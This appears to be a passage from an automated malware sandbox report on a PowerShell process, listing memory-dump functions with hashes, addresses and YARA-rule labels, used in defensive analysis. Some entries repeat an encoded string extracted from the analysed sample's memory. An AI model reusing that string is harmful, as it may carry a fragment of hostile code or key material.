                                                                                                                                                                                                    • Opcode ID: 9acbd10d7e3ce8a79433d4c6e9f391cd8b79f366ae61522b974fd6ca4070949f
                                                                                                                                                                                                    • Instruction ID: 818bb4b447896a345d34c03f916bdd16cce2c663fd018915b233506c1360ebb5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9acbd10d7e3ce8a79433d4c6e9f391cd8b79f366ae61522b974fd6ca4070949f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C67128F0B30297CFCB24AF299644A7ABBE1AF85351F14806AD545CB355EB31C981C7E2
                                                                                                                                                                                                    Function 07FD94E1 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (Xcq$LR^q
                                                                                                                                                                                                    • API String ID: 0-2856513941
                                                                                                                                                                                                    • Opcode ID: 2a88f41f28fe221015e6480e0a8027fd1132855d9a2e19b87834bd18ec0e541d
                                                                                                                                                                                                    • Instruction ID: ad93ca7f72f167ee04744f7b24205e9065d3a1345b22f26d840cb94b5168e53a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a88f41f28fe221015e6480e0a8027fd1132855d9a2e19b87834bd18ec0e541d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B515A70B00214CFDB24CFA8C850B9EBBB2EF89700F1541A9D549AB394DBB1AD41CB91
                                                                                                                                                                                                    Function 07FD82C8 Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (bq$(bq
                                                                                                                                                                                                    • API String ID: 0-4224401849
                                                                                                                                                                                                    • Opcode ID: 5dcf21d9ffda037b6d5c94c75f6c04516037bbfcad832799282713165e00add6
                                                                                                                                                                                                    • Instruction ID: 6f028de7c351c98d75852e33aff30fc931eeceeda978fb80a1153c2ae1f5c11d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dcf21d9ffda037b6d5c94c75f6c04516037bbfcad832799282713165e00add6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B31D074A04124CFDB19ABA9E4187AE7BB2EF85351F18406ED406E7781CF748C42CB81
                                                                                                                                                                                                    Function 07FD3C80 Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z, xrefs: 07FD3CC5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z
                                                                                                                                                                                                    • API String ID: 0-1412611895
                                                                                                                                                                                                    • Opcode ID: aaa9de73936f2090a016b879101b7b93081dc3461d16b155198918ddb1202404
                                                                                                                                                                                                    • Instruction ID: 5a11a75de313ae8c4fc267bd93524cdc8c893c540225fa6913429e4d5c284311
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaa9de73936f2090a016b879101b7b93081dc3461d16b155198918ddb1202404
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17919DB4F00255CBCB289F79D16846EB7F7EF88760B288A1CD4129B394DF34AC458B51
                                                                                                                                                                                                    Function 07FD3C90 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z, xrefs: 07FD3CC5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z
                                                                                                                                                                                                    • API String ID: 0-1412611895
                                                                                                                                                                                                    • Opcode ID: e3865aa702924c2f6a1391c26f2e6de00a91835c23a124f50a26885f27f598e6
                                                                                                                                                                                                    • Instruction ID: 8245af9829fadfcb3434b4bd2a3ff04c8007f70398ea9598ce7d1aac6bda2033
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3865aa702924c2f6a1391c26f2e6de00a91835c23a124f50a26885f27f598e6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33919CB4F00615CBCB28AF79D16846EB7F7EF88760B688A1CD4129B394DF34AC458B51
                                                                                                                                                                                                    Function 07FD4180 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z, xrefs: 07FD422F, 07FD423D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z
                                                                                                                                                                                                    • API String ID: 0-1412611895
                                                                                                                                                                                                    • Opcode ID: e8bb48a88b704bd3a27435ce6893c5c514527fd9c0d35b2adf61ed26abf4050d
                                                                                                                                                                                                    • Instruction ID: 13c4db7032665932d07a70ef0da93b9a162dc5bf2327afdcfdb76da4beac86ba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8bb48a88b704bd3a27435ce6893c5c514527fd9c0d35b2adf61ed26abf4050d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55416B757206508FC755CF39D88885ABBF5FF8962031682AAE809CB372DB71DC05CB90
                                                                                                                                                                                                    Function 07274CF6 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q
                                                                                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                                                                                    • Opcode ID: 1ff41d1be614bb9507dd76724f0f470290c12b95547433bea3fe66baf492836d
                                                                                                                                                                                                    • Instruction ID: a041781ad8c6ace81ab10716ea0e683f248a6d8442209e1f9f93e6a79f7c5479
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff41d1be614bb9507dd76724f0f470290c12b95547433bea3fe66baf492836d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F2155F57342C38FCB616E248A40B7ABBB1AF85250F0940A7D940CF265EB35C944C7B2
                                                                                                                                                                                                    Function 07FD83FE Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (bq
                                                                                                                                                                                                    • API String ID: 0-149360118
                                                                                                                                                                                                    • Opcode ID: 2b433d0433e521b81d17ba0807956d3dd340ea3cfd6b99f66c8f088b705bab44
                                                                                                                                                                                                    • Instruction ID: 02cb97556509ddcfe42cd7d3b95d247cb2d4addb635bac6bf7121d34a3846eff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b433d0433e521b81d17ba0807956d3dd340ea3cfd6b99f66c8f088b705bab44
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 540156397590648FCB566BB9B0181AE7BE6DFC5261728416ED407C7B82CE388D028796
                                                                                                                                                                                                    Function 07FD41F8 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z, xrefs: 07FD422F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z
                                                                                                                                                                                                    • API String ID: 0-1412611895
                                                                                                                                                                                                    • Opcode ID: d16d253cefc95b4bbb21328ff99957b947238193e0045740ce7098e8cbd314ce
                                                                                                                                                                                                    • Instruction ID: d18bd9f5f9018257528749d5bd9f2686ecd9b7fb938b240cd37de3ed3e264056
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d16d253cefc95b4bbb21328ff99957b947238193e0045740ce7098e8cbd314ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF0E532A287D21FC3068769EC848E6FFB5EED722432943ABF004C7522D79099808350
                                                                                                                                                                                                    Function 07FD7A08 Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: fc1df3d95b334cadb24601e4418c1d8c904360b4ef709552a31e3608287cf47b
                                                                                                                                                                                                    • Instruction ID: 6e387f0717bc0b12f879af54aa4f1b40c211fe49ecfee2fdbde021de2fed701c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc1df3d95b334cadb24601e4418c1d8c904360b4ef709552a31e3608287cf47b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF10E75A00209DFCB15DF98D594A9DBBF2FF49310F288559E805AB365C731ED81CBA0
                                                                                                                                                                                                    Function 043F72C0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b4be69a57e870a85e4076d267f0de0514f6997703f64fa08c8e664ead3b3d4f9
                                                                                                                                                                                                    • Instruction ID: 8ae5e2d1d85a05b3dabaf9f1e9cf972df5c0d3ba0de5303b69607eb3fe342b5d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4be69a57e870a85e4076d267f0de0514f6997703f64fa08c8e664ead3b3d4f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CA17F34A01254DFCB15DF68C8849AEBBF2FF89310F1584A9E949AB361DB35EC45CB90
                                                                                                                                                                                                    Function 043FD4C0 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: ff22485b82e953409b0d387e27fe346080632f6644da3ce93d22fa7d727ddc41
                                                                                                                                                                                                    • Instruction ID: 851ef90457900cda375abcc6eedf02fb520dd7b4843aad034db3a767d7a0f0a5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff22485b82e953409b0d387e27fe346080632f6644da3ce93d22fa7d727ddc41
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93818030A002048FDB14EF78D898AAEBBF2EF89304F14896DD516AB351DB35EC46CB50
                                                                                                                                                                                                    Function 07FD4555 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: a1a5bde71cc190c8890d70c3b5f6303769b2f8d32c3f0fcee2dd202fafb54e75
                                                                                                                                                                                                    • Instruction ID: 947c3c1d5f45c6de8c4b2fed172cd2fe0813b344aedf403bd4d29b559470aed5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1a5bde71cc190c8890d70c3b5f6303769b2f8d32c3f0fcee2dd202fafb54e75
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C01F571529AD08FC71387B4E8496B97FB0AF47310B0D029FDC858B652D3769C46C781
                                                                                                                                                                                                    Function 043F2AA8 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 0d3283688a664608eabd97d4cc3e77af2e5110b3ab416bbce0988c83e631830d
                                                                                                                                                                                                    • Instruction ID: 7af0912fbc29c82d7258a5ecf8d9b79161f105fda04b28fb1bb64c34753bc9e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d3283688a664608eabd97d4cc3e77af2e5110b3ab416bbce0988c83e631830d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15917C74A00209CFCB05CF99C8949AAFBB1FF88310B258599E915AB3A5D736FC51CF90
                                                                                                                                                                                                    Function 07FD45BD Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: bf6db639518a397c75ad43075f34b80ef5d3ac24ff9fcfd38670e308071a404a
                                                                                                                                                                                                    • Instruction ID: 3e9cbd6199f0841c68f33b33f8195373d07525212b59435ece8a5f74613dc141
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf6db639518a397c75ad43075f34b80ef5d3ac24ff9fcfd38670e308071a404a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF0F4B56256D18FC3239A38A0582A9BFE1DF47220B0C02DED4564B952D375984AC741
                                                                                                                                                                                                    Function 07FD4565 Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 49d0cbf1704424c4cc65ef8bf69af44046c7024a5f8a010c11a4bb363988d84e
                                                                                                                                                                                                    • Instruction ID: 4d5c877a968f84610453de0972267b85b4bef96c55d6e2ab4ab5111b19924efa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49d0cbf1704424c4cc65ef8bf69af44046c7024a5f8a010c11a4bb363988d84e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF0F6715297D08FC3234278E4086B9BFF1AF43220B0C01AFD89687992D7759C45C745
                                                                                                                                                                                                    Function 07FD456D Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 963d71a1c6fd7dcb5a0eb0b2c5a027eeda138e705237587a4e6491ebe62295db
                                                                                                                                                                                                    • Instruction ID: 8acdf91c47c666bb0b0ea9ded4913d3384b8be5c800a4d98f56967ad88988e81
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 963d71a1c6fd7dcb5a0eb0b2c5a027eeda138e705237587a4e6491ebe62295db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87F022715297D49FC3238774E4495B9BBF0BF06314B0C01AED89A8BAA2D7669C06CB80
                                                                                                                                                                                                    Function 07FD45CD Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 1ffab1ea6545cef1c74a3da5761ffac9488ea83d11e567bbf929a614664463f0
                                                                                                                                                                                                    • Instruction ID: 671c4b8afd62aa55a5d123a707bd3581168de8f886025ca30eabeae6ed871a71
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ffab1ea6545cef1c74a3da5761ffac9488ea83d11e567bbf929a614664463f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3F082706297E14FC3238378A0581E9BFF09F43224B0D05DFD8D68B993C3A69846CB52
                                                                                                                                                                                                    Function 07FD4730 Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 14ee072ec284cd5efd19b20e28f24a2b7f3f250df75b584c566d4aa404c87b4d
                                                                                                                                                                                                    • Instruction ID: e2bf80009e9bc49cbcec088e63f1c9d958453230de8d123f4976a4b08fc9a74d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14ee072ec284cd5efd19b20e28f24a2b7f3f250df75b584c566d4aa404c87b4d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC51F132A001549FCB169FB5D8189AEBFF2FF89310B1940AEE5068B262CB31DC51CB90
                                                                                                                                                                                                    Function 043FD4B0 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 92e922213adc817c2310cd14b224569fb3f140968b915e976d5ca1ce4216a4c1
                                                                                                                                                                                                    • Instruction ID: 85e324d3afab1f19cec298eea8b606a536b5114c01cd7f47b96b5aa773d8a87c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92e922213adc817c2310cd14b224569fb3f140968b915e976d5ca1ce4216a4c1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC613F34A006048FDB24EF78D998AAEB7F2AF89304F54896CD516AB350DF35EC45CB50
                                                                                                                                                                                                    Function 07FD3FF0 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d5c27753455365de2bc942d6b3783c1ddfaf5bfbcb04a847a45f69a0d9402458
                                                                                                                                                                                                    • Instruction ID: 41e93a980bbaa6907c211adb5c6c0af9e2a116cb0be9c057a5792794c58407f3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5c27753455365de2bc942d6b3783c1ddfaf5bfbcb04a847a45f69a0d9402458
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51D3B6B011159FD704CF69D884AAEBBB6FF89711F1880A6E919CB361C771EC01CB90
                                                                                                                                                                                                    Function 07FD8E48 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d3c6f3e42aaa1ea2bc9a6a5ec93419c39c50d53016f8abe8f2f14d761bc140d2
                                                                                                                                                                                                    • Instruction ID: 5778b24873b1151876f962fc29d50766004f3e4bb6b507d5f4f96dba6cb5e134
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3c6f3e42aaa1ea2bc9a6a5ec93419c39c50d53016f8abe8f2f14d761bc140d2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7512970B01254CFEB25DB78C854BAD77B6AF89244F1844A9D00ADB3A1DF359C86CF50
                                                                                                                                                                                                    Function 07FDA368 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 1be8e52abfb3dd0ac2d66397314e7782c6ad8545bd715e968b1e5d46e2104b21
                                                                                                                                                                                                    • Instruction ID: 6c14d05df61e791d84958d46e380d464da3df53a6ee68710c03c3e19aa9e28ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1be8e52abfb3dd0ac2d66397314e7782c6ad8545bd715e968b1e5d46e2104b21
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6513875A002089FCB14DFA9D4849DEFBF6EF89320B1981AAE804A7311D735EC45CBA0
                                                                                                                                                                                                    Function 07FD8590 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
